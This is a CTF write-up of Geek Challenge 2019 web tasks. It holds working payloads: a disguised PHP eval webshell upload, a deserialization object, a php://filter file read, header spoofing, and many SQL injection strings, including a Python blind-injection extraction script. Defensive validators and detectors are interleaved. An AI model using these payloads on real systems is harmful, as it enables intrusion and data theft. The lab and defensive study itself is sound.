Geek challenge 2019 (review the loopholes)
2022-07-26 23:55:00 【Occasionally dodge dark clouds 334】
[Geek challenge 2019] Upload
A file upload question; I have run into this solution before.
First try .php: it is definitely filtered.
Then upload image code and find that it also checks the contents of the file.

It turns out the opening of the one-line Trojan is filtered, but as we saw earlier, the script tag can replace it:
<script language='php'>eval($_POST['shell']);</script>
Still wrong.

The response said I had tried to fool it, so I wondered whether it verifies the file header. Add a GIF89a at the front.

Sure enough, the upload succeeded. Connecting with the webshell client is then fine, but 2.jpg has to be renamed to 2.phtml before it gets parsed:
http://4c926abd-6b99-412d-88df-d1d3d42a7d3b.node4.buuoj.cn:81/upload/2.phtml
Connect to the shell.

Get the flag.
Testing 2.phtml, sure enough there is an echo; take a look at the environment.

It shows that the upload really succeeded; shell is the password of the Trojan.
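The three checks this challenge relied on (blocked .php extension, a look for <?php in the body, leading magic bytes) all pass a .phtml file that starts with GIF89a. The added example below is not the challenge's code: it reconstructs that check from the writeup's observations and sets a hardened validator beside it (extension allowlist, magic bytes tied to the extension, server-generated file name).

```python
import os
import re
import secrets
from typing import Optional

# Constructed sample uploads, not files from the original challenge.
FAKE_GIF_SHELL = b"GIF89a<script language='php'>eval($_POST['shell']);</script>"
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

# Roughly what the challenge did (assumption based on the writeup): block the
# .php extension, look for '<?php' in the body, check the leading magic bytes.
# 'GIF89a' in front of a script tag inside a .phtml file passes all three.
def challenge_style_check(filename: str, data: bytes) -> bool:
    if filename.lower().endswith(".php"):
        return False
    if b"<?php" in data:
        return False
    return data[:6] == b"GIF89a" or data[:8] == b"\x89PNG\r\n\x1a\n"

# Hardened version: extension allowlist, magic bytes must match that
# extension, no script markers anywhere in the body, and the stored name is
# generated server side so the client never chooses what the server parses.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
}
SCRIPT_MARKER = re.compile(rb"<\?|<script\b", re.IGNORECASE)

def hardened_check(filename: str, data: bytes) -> Optional[str]:
    """Return the name to store the file under, or None if it is rejected."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext not in ALLOWED:                       # .phtml, .phar, ... never get here
        return None
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return None
    if SCRIPT_MARKER.search(data):               # defence in depth only
        return None
    return f"{secrets.token_hex(16)}.{ext}"
```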
[Geek challenge 2019] PHP
A deserialization question.
Opening the page there is nothing but a cat, and the source has nothing either.
This usually means a backup file. I actually don't like backup files, since scanning the directory is too slow. I ran dirsearch on the directory; actually I tried index.php.bak first and found nothing, then www.zip came out.
Common backup file suffixes for website source code:
tar.gz, zip, rar, tar
Common backup file names for website source code:
web, website, backup, back, www, wwwroot, temp
Unzipping gives three files: class.php, flag.php, index.php.
But opening flag.php, it is obviously fake at first glance. The code that matters:
<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function __wakeup(){
        $this->username = 'guest';
    }
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
Construct the deserialization chain. The pitfall here is that the properties are declared private, so each serialized property name has to be wrapped as %00ClassName%00; for this question that is %00Name%00, which adds 6 bytes to the name length (each %00 is a single byte). I'll skip the simple construction and go straight to the payload:
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
What wasted my time is that I couldn't find the input variable; finally I looked at a writeup and found it is at the bottom of index.php:

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
Obtain the flag.
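A serialized PHP object arriving in a query parameter is something a defender can recognise before it reaches unserialize(). The added example below (not part of the original writeup) parses the flat object shape used above, decodes the %00 private-property markers, and flags the declared-versus-actual property count mismatch (3 declared, 2 present) that the payload relies on; SAMPLE_QUERY is constructed from the payload shape shown in the post.

```python
import re
from urllib.parse import unquote
# Constructed from the payload shape in the writeup; nulls arrive URL-encoded.
SAMPLE_QUERY = ('select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";'
                's:14:"%00Name%00password";s:3:"100";}')

OBJ_HEAD = re.compile(r'O:\d+:"([^"]*)":(\d+):\{')
STR_TOKEN = re.compile(r's:(\d+):"')
SCALAR = re.compile(r'(?:i:-?\d+|d:[^;]+|b:[01]|N);')

def parse_php_object(blob):
    """Walk one flat serialized object: return (class, declared_count, names)."""
    m = OBJ_HEAD.match(blob)
    if not m:
        return None
    cls, declared, pos, names = m.group(1), int(m.group(2)), m.end(), []
    while pos < len(blob) and blob[pos] != "}":
        sm = STR_TOKEN.match(blob, pos)          # property name is always a string
        if not sm:
            return None
        n = int(sm.group(1))
        names.append(blob[sm.end():sm.end() + n])
        pos = sm.end() + n + 2                   # skip closing quote and ';'
        sm = STR_TOKEN.match(blob, pos)          # value: string ...
        if sm:
            pos = sm.end() + int(sm.group(1)) + 2
        else:                                    # ... or a scalar
            vm = SCALAR.match(blob, pos)
            if not vm:
                return None
            pos = vm.end()
    return cls, declared, names

def assess(query):
    """Inspect a request parameter that may carry a PHP serialized object."""
    value = unquote(query.split("=", 1)[1])
    parsed = parse_php_object(value)
    if not parsed:
        return {"serialized_object": False}
    cls, declared, names = parsed
    return {
        "serialized_object": True,
        "class": cls,
        # \0Name\0 prefix = private property: the client is setting members the
        # class never exposed, so the object must not be trusted after unserialize().
        "private_props": [n.replace("\0", "\\0") for n in names if "\0" in n],
        # Declared count above the real count is the old-PHP trick that skips
        # __wakeup() (CVE-2016-7124), which is what would reset username to guest.
        "count_mismatch": declared != len(names),
    }
```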

[Geek challenge 2019] Havefun
This one is really easy to finish.
First open the page.

I'm used to looking at the source first, and unexpectedly there really is something:

Passing ?cat=dog outputs the flag; I tried it and it was right.

Really happy.
[Geek challenge 2019] Secret File

Open the page for a second; the old rule is to look at the source first.

See an address to visit.

It reminds me of a "too fast to capture" type of problem: after clicking SECRET it jumps to end.php.
The source should contain the hyperlink.

I saw action.php, so capture the request and note where action.php is written in the GET request.

Visit secr3t.php and see the source:
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
include($file);
// the flag is in flag.php
?>
</html>
In effect it filters out ../, tp, input and data.
Then use a pseudo protocol; php://filter can read the flag:
?file=php://filter/read=convert.base64-encode/resource=flag.php
Remember the URL has to be secr3t.php, because that is the page with the source.

The base64 comes back; decode it to get the flag.
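The denylist in secr3t.php never mentions the php://filter wrapper, which is why the payload above passes. The added example below (not from the challenge) transcribes that check into Python and sets an allowlist resolver beside it: the client names a page, the server decides the file. The PAGES map and WEB_ROOT are assumptions for illustration.

```python
import os
from typing import Optional

# The check from secr3t.php, transcribed: a denylist of substrings.
def challenge_denylist_ok(file: str) -> bool:
    low = file.lower()
    return not ("../" in file or "tp" in low or "input" in low or "data" in low)

# Hardened replacement: map a page name to a file on disk instead of
# including whatever string the client sends. Hypothetical layout.
PAGES = {"index": "index.php", "secret": "end.php"}
WEB_ROOT = "/var/www/html"   # assumed base directory

def resolve_include(name: str) -> Optional[str]:
    # Stream wrappers (php://, data:, ...) and embedded NULs are never pages.
    if "://" in name or ":" in name or "\0" in name:
        return None
    if name not in PAGES:
        return None
    path = os.path.normpath(os.path.join(WEB_ROOT, PAGES[name]))
    # Belt and braces: the resolved path must stay under WEB_ROOT.
    if not path.startswith(WEB_ROOT + os.sep):
        return None
    return path
```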
[Geek challenge 2019] Http
Open the page.

Look at the code; see a hyperlink to secret.php and visit it.

Capture the request and modify it: "You are not from this website", so add a Referer.

Then I sent the request again, and it said I wasn't using the Syclover browser.
User Agent, abbreviated UA, is a special string header that lets the server identify the client's operating system and version, CPU type, browser and version, browser rendering engine, browser language, browser plugins and so on.

"You can only access from the local address", so try X-Forwarded-For: 127.0.0.1

The flag comes out. I got stuck on the User Agent; I don't know whether it would work to switch the browser and access it.
[Geek challenge 2019] Knife

It feels like a command execution problem, but I tried for a long time and couldn't pass parameters.
Finally I got the idea: isn't this a one-line Trojan? Tested Syc=phpinfo();

Then connect directly with the webshell client. Done, a sign-in question.

[Geek challenge 2019] BuyFlag
Enter the page and check the source directly; I saw a clue.

Visit pay.php.

It says only CUIT students can buy the flag.
Then continue checking the source and found:

Weak comparison: pass in 404%00 and the system will automatically treat it as not a number.
POST the parameters, but several tries were wrong. I remembered it must be a CUIT student, so capture the request with Burp.

In the request there is Cookie: user=0, which is where identity is judged; in boolean terms 0 is false and 1 is true, so change it to Cookie: user=1 to authenticate.

Identity succeeds.

Because I need to buy, pass in money, but it says the length is too long:
"Nember lenth is too long". There should be a length limit; two ways to bypass:
1. Scientific notation bypass: money=1e9
2. Array bypass: money[]=1

SQL injection questions
[Geek challenge 2019] EasySQL
1. Try logging in with account admin, password 123456 and some common account passwords; the page says the username or password is wrong.
2. Try the closing: enter 1, 1', 1" as the account and judge; 1' gives an error, so the statement should close with single quotes (tip: remember to fill in the password).
I concluded single-quote closing, then tried the universal password
1' or true# (# comments out the trailing quote)

Write the password casually; # is ignored.

Obtain the flag.
[Geek challenge 2019] LoveSQL
First judge the closing method: 1' reports an error.
Then try the universal password.

Got this page; then I tried and found it useless.
Looked for ideas again; try union injection.
1' union select 1,2,3# to judge the echo positions

Query the database: 1' union select 1,database(),3 # The database is geek.
Continue: 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="geek" #

Two tables; it feels like it is in the latter one.
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="l0ve1ysq1" #

It feels like it is in password.
1' union select 1,group_concat(password),group_concat(username) from l0ve1ysq1#

Along the way I reviewed union injection.
[Geek challenge 2019] BabySQL
The old method: judge the closing first; it is still single quotes.
Trying the universal password, the echo is different from what I entered.
Input 1' or true#

But or is not in the echo; it should be that or is filtered into spaces. I found that changing case doesn't work, so try double-write injection: oorr succeeds.

Similar to the previous question; I feel this one filters some commonly used functions.
1' union select 1,2,3#
Found that union and select are all filtered; continue double writing to bypass:
1' uniunionon selselectect 1,2,3#

1' uniunionon selselectect 1,database(),3# still the geek database
1' uniunionon selselectect 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
information is filtered again, and so is from.
Because or is filtered, information doesn't survive either.
1' uniunionon selselectect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables where table_schema=database()#

Found that where is also filtered.
1' uniunionon selselectect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whewherere table_schema=database()#

Success; it feels like the first table name.
1' uniunionon selselectect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whewherere table_name="b4bsql"#

1' uniunionon selselectect 1,group_concat(password),3 frfromom b4bsql#
After trying for a long time it was wrong; the echo said passwd doesn't exist. It turned out the or in password is also filtered, so bypass it:
1' uniunionon selecselectt 1,group_concat(passwoorrd),3 frfromom b4bsql#
If the page display overlaps, just zoom out.
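The double-write bypass works because the filter removes each keyword exactly once, and as the passwoorrd step shows, the same filter also breaks legitimate input. The added example below is not the challenge's code: it reconstructs that single-pass filter from the writeup's observations, shows that even a fixpoint version still mangles the word password, and sets a parameterized query beside it (the in-memory SQLite users table is constructed for the demo; SQLite uses -- rather than # for comments).

```python
import re
import sqlite3

BLOCKED = ("union", "select", "from", "where", "or")

def strip_once(s: str) -> str:
    """Single-pass keyword removal, the behaviour observed in the challenge."""
    for kw in BLOCKED:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)
    return s

def strip_to_fixpoint(s: str) -> str:
    """Repeat until nothing changes. This defeats double-writing but still
    destroys legitimate input: the 'or' inside 'password' disappears too."""
    while True:
        t = strip_once(s)
        if t == s:
            return t
        s = t

def login_vulnerable(conn, username: str, password: str):
    # String-built query guarded only by the filter: oorr becomes or.
    q = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (
        strip_once(username), strip_once(password))
    return conn.execute(q).fetchall()

def login_safe(conn, username: str, password: str):
    # Placeholders: the input is data, never SQL, so no filter is needed.
    q = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(q, (username, password)).fetchall()

def demo_db():
    # Constructed sample table for the demonstration.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES('admin','s3cret')")
    return conn
```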
[Geek challenge 2019] HardSQL
Open the site and try the previous method; the echo is always the same sentence.

union select and so on: union injection is filtered out.
Then I thought of error-based injection.
This uses the XOR method ^. A single quote closes the position and produces an error; then append extractvalue after it, and a special symbol inside it will trigger the error-based injection; 0x7e is such a special symbol.
1'^extractvalue(1,concat(0x7e,(select(database()))))#

Then query the table name
1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))#
~H4rDsq1
Field name
1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))#
password
1'^extractvalue(1,concat(0x7e,(select(right(group_concat(password),30))from(H4rDsq1))))#

Finding the result incomplete, use left and right to splice the two halves and get the flag:
flag{d015f65f-ddd0-4886-87a1-9 (left)
'~f-ddd0-4886-87a1-94d5a3c6bcb2} (right)
flag{d015f65f-ddd0-4886-87a1-94d5a3c6bcb2}
[Geek challenge 2019] FinalSQL
This is how the page looks when opened; clicking through one by one, only id changes.
This question also filters a lot; the title says SQL blind injection, so that is what I thought of.
Note the injection point should be the id position; enter id=6'
XOR can also be used to inject: 1^0=1, 1^1=0, 0^0=0


If it hits, it jumps to the error page.
import requests

flag = ''
for i in range(1, 250):
    left = 32
    right = 128
    mid = (left + right) // 2
    while left < right:
        # XOR with the id: a true comparison turns id=1 into 0 and lands on the error page
        res = requests.get('http://e487615c-08e4-4b1d-a3d2-fae355b974c9.node3.buuoj.cn/search.php?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)' % (i, mid))
        if 'ERROR' in res.text:
            left = mid + 1
        else:
            right = mid
        mid = (left + right) // 2
    # past the end of the string the search converges on 32; stop there
    if mid == 32 or mid == 127:
        break
    flag = flag + chr(mid)
    print(flag)
Table name:
res=requests.get('http://e4bf984f-85ef-4713-9180-1aaa9c19c08c.node4.buuoj.cn:81/search.php?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),%d,1))>%d)'%(i,mid))
F1naI1y,Flaaaaag
Field name:
res = requests.get('http://e4bf984f-85ef-4713-9180-1aaa9c19c08c.node4.buuoj.cn:81/search.php?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="Flaaaaag"),%d,1))>%d)'%(i,mid))
id,fl4gawsl
res = requests.get('http://e4bf984f-85ef-4713-9180-1aaa9c19c08c.node4.buuoj.cn:81/search.php?id=1^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),%d,1))>%d)'%(i,mid))
The difficulty of this problem is that it doesn't follow the routine: the Flaaaaag table has an fl4gawsl field whose value is NO; the real flag is in the password field of the F1naI1y table.
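Seen from the server side, the script above leaves a very regular trail: dozens of requests from one client that differ only in the offset and threshold numbers, with the status code flipping between the normal page and the error page. The added example below is not part of the writeup; it runs a detector over constructed access-log lines shaped like that traffic (the IPs, timestamps and sizes are made up).

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed access-log lines mimicking the script's traffic; not real logs.
LOG_LINES = """\
10.0.0.7 - - [26/Jul/2022:23:40:01 +0800] "GET /search.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [26/Jul/2022:23:40:02 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),1,1))%3E80) HTTP/1.1" 200 512
10.0.0.9 - - [26/Jul/2022:23:40:02 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),1,1))%3E104) HTTP/1.1" 500 233
10.0.0.9 - - [26/Jul/2022:23:40:03 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),1,1))%3E92) HTTP/1.1" 200 512
10.0.0.9 - - [26/Jul/2022:23:40:03 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),2,1))%3E80) HTTP/1.1" 500 233
10.0.0.7 - - [26/Jul/2022:23:40:04 +0800] "GET /search.php?id=2 HTTP/1.1" 200 498
""".splitlines()

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# Markers of the boolean/XOR probe shape used against search.php?id=
PROBE = re.compile(r"ascii\(substr\(|\^\(", re.IGNORECASE)

def shape(query):
    """Collapse digit runs so probes that differ only by offset or threshold
    (the i and mid of the binary search) compare equal."""
    return re.sub(r"\d+", "N", query)

def find_blind_probers(lines, min_probes=3):
    """Return {client: stats} for clients sending repeated probe-shaped
    requests. Seeing both a normal and an error status for one shape is the
    yes/no oracle a blind-injection script depends on."""
    stats = defaultdict(lambda: {"count": 0, "statuses": set(), "shapes": set()})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, url, status = m.groups()
        query = unquote(url.split("?", 1)[1]) if "?" in url else ""
        if not PROBE.search(query):
            continue
        stats[client]["count"] += 1
        stats[client]["statuses"].add(status)
        stats[client]["shapes"].add(shape(query))
    return {c: s for c, s in stats.items() if s["count"] >= min_probes}
```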

That's it. Next I want to focus on RCE without echo. Come on!
day day up!